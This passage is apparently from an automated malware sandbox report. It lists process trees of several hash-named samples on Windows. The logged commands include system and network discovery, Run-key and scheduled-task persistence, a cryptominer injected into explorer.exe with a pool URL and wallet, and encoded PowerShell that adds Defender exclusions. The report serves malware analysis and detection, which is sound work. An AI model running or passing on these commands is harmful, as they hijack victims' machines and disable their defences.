                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4784
                                                                                                • C:\Windows\SysWOW64\getmac.exe
                                                                                                  "C:\Windows\system32\getmac.exe"
                                                                                                  4⤵
                                                                                                    PID:840
                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
                                                                                                    4⤵
                                                                                                      PID:2000
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
                                                                                                    3⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:1124
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt"
                                                                                                    3⤵
                                                                                                      PID:2980
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        wmic OS get Caption, CSDVersion, OSArchitecture, Version / value
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:2628
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt"
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:5644
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        wmic nicconfig where 'IPEnabled = True' get ipaddress
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5548
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                                                                                      3⤵
                                                                                                        PID:4572
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                                                                                          4⤵
                                                                                                          • Adds Run key to start application
                                                                                                          • Modifies registry key
                                                                                                          PID:4948
                                                                                                  • C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe
                                                                                                    "C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe"
                                                                                                    1⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:4124
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
                                                                                                      2⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1840
                                                                                                    • C:\ProgramData\SystemData\igfxCUIService.exe
                                                                                                      "C:\ProgramData\SystemData\igfxCUIService.exe"
                                                                                                      2⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1484
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
                                                                                                        3⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:6000
                                                                                                        • C:\Windows\SysWOW64\getmac.exe
                                                                                                          "C:\Windows\system32\getmac.exe"
                                                                                                          4⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4432
                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
                                                                                                          4⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:5616
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
                                                                                                        3⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1560
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:916
                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                          wmic OS get Caption, CSDVersion, OSArchitecture, Version / value
                                                                                                          4⤵
                                                                                                            PID:2532
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt"
                                                                                                          3⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:5748
                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                            wmic nicconfig where 'IPEnabled = True' get ipaddress
                                                                                                            4⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:5136
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                                                                                          3⤵
                                                                                                            PID:5364
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                                                                                              4⤵
                                                                                                              • Adds Run key to start application
                                                                                                              • Modifies registry key
                                                                                                              PID:5452
                                                                                                      • C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe
                                                                                                        "C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe"
                                                                                                        1⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5748
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
                                                                                                          2⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2536
                                                                                                        • C:\ProgramData\SystemData\igfxCUIService.exe
                                                                                                          "C:\ProgramData\SystemData\igfxCUIService.exe"
                                                                                                          2⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4800
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
                                                                                                            3⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:1000
                                                                                                            • C:\Windows\SysWOW64\getmac.exe
                                                                                                              "C:\Windows\system32\getmac.exe"
                                                                                                              4⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2028
                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
                                                                                                              4⤵
                                                                                                                PID:2368
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
                                                                                                              3⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:1400
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt"
                                                                                                              3⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:5860
                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                wmic OS get Caption, CSDVersion, OSArchitecture, Version / value
                                                                                                                4⤵
                                                                                                                  PID:2616
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt"
                                                                                                                3⤵
                                                                                                                  PID:5868
                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                    wmic nicconfig where 'IPEnabled = True' get ipaddress
                                                                                                                    4⤵
                                                                                                                      PID:4712
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                                                                                                    3⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:1868
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                                                                                                      4⤵
                                                                                                                      • Adds Run key to start application
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Modifies registry key
                                                                                                                      PID:4424
                                                                                                              • C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe
                                                                                                                "C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe"
                                                                                                                1⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4928
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\Admin\Downloads\1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3516
                                                                                                                • C:\ProgramData\SystemData\igfxCUIService.exe
                                                                                                                  "C:\ProgramData\SystemData\igfxCUIService.exe"
                                                                                                                  2⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5304
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
                                                                                                                    3⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:2620
                                                                                                                    • C:\Windows\SysWOW64\getmac.exe
                                                                                                                      "C:\Windows\system32\getmac.exe"
                                                                                                                      4⤵
                                                                                                                        PID:2552
                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
                                                                                                                        4⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1692
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
                                                                                                                      3⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      PID:5552
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt"
                                                                                                                      3⤵
                                                                                                                        PID:2388
                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                          wmic OS get Caption, CSDVersion, OSArchitecture, Version / value
                                                                                                                          4⤵
                                                                                                                            PID:4188
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt"
                                                                                                                          3⤵
                                                                                                                            PID:5268
                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                              wmic nicconfig where 'IPEnabled = True' get ipaddress
                                                                                                                              4⤵
                                                                                                                                PID:5912
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                                                                                                              3⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:5624
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
                                                                                                                                4⤵
                                                                                                                                • Adds Run key to start application
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Modifies registry key
                                                                                                                                PID:1584
                                                                                                                        • C:\Program Files\7-Zip\7zG.exe
                                                                                                                          "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap8705:190:7zEvent27863
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5828
                                                                                                                        • C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
                                                                                                                          "C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:1760
                                                                                                                          • C:\Users\Admin\AppData\Roaming\xmrmine.exe
                                                                                                                            C:\Users\Admin\AppData\Roaming\xmrmine.exe
                                                                                                                            2⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4724
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
                                                                                                                              3⤵
                                                                                                                                PID:3220
                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
                                                                                                                                  4⤵
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:2656
                                                                                                                              • C:\Users\Admin\appdata\roaming\serverpatch.exe
                                                                                                                                "C:\Users\Admin\appdata\roaming\serverpatch.exe"
                                                                                                                                3⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4512
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
                                                                                                                                  4⤵
                                                                                                                                    PID:5404
                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
                                                                                                                                      5⤵
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:1348
                                                                                                                                  • C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
                                                                                                                                    "C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:1952
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:5296
                                                                                                                              • C:\Users\Admin\AppData\Roaming\etcmin.exe
                                                                                                                                C:\Users\Admin\AppData\Roaming\etcmin.exe
                                                                                                                                2⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:220
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
                                                                                                                                  3⤵
                                                                                                                                    PID:2920
                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
                                                                                                                                      4⤵
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:5224
                                                                                                                                  • C:\Users\Admin\appdata\roaming\rtksmbs.exe
                                                                                                                                    "C:\Users\Admin\appdata\roaming\rtksmbs.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:4984
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
                                                                                                                                      4⤵
                                                                                                                                        PID:5144
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
                                                                                                                                          5⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:5012
                                                                                                                                      • C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
                                                                                                                                        "C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
                                                                                                                                        4⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4992
                                                                                                                                • C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
                                                                                                                                  "C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:5344
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\xmrmine.exe
                                                                                                                                    C:\Users\Admin\AppData\Roaming\xmrmine.exe
                                                                                                                                    2⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1740
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
                                                                                                                                      3⤵
                                                                                                                                        PID:3400
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
                                                                                                                                          4⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:5064
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\etcmin.exe
                                                                                                                                      C:\Users\Admin\AppData\Roaming\etcmin.exe
                                                                                                                                      2⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2632
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
                                                                                                                                        3⤵
                                                                                                                                          PID:396
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
                                                                                                                                            4⤵
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:3780
                                                                                                                                    • C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
                                                                                                                                      "C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4552
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\xmrmine.exe
                                                                                                                                        C:\Users\Admin\AppData\Roaming\xmrmine.exe
                                                                                                                                        2⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:4044
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
                                                                                                                                          3⤵
                                                                                                                                            PID:2716
                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
                                                                                                                                              4⤵
                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                              PID:5616
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\etcmin.exe
                                                                                                                                          C:\Users\Admin\AppData\Roaming\etcmin.exe
                                                                                                                                          2⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2560
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
                                                                                                                                            3⤵
                                                                                                                                              PID:4440
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
                                                                                                                                                4⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:5768
                                                                                                                                        • C:\Windows\system32\taskmgr.exe
                                                                                                                                          "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                          1⤵
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          PID:5164
                                                                                                                                        • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                          "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273\" -ad -an -ai#7zMap5328:190:7zEvent11755
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5964
                                                                                                                                        • C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
                                                                                                                                          "C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"
                                                                                                                                          1⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5016
                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                            "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                                                                                                                                            2⤵
                                                                                                                                              PID:1272
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
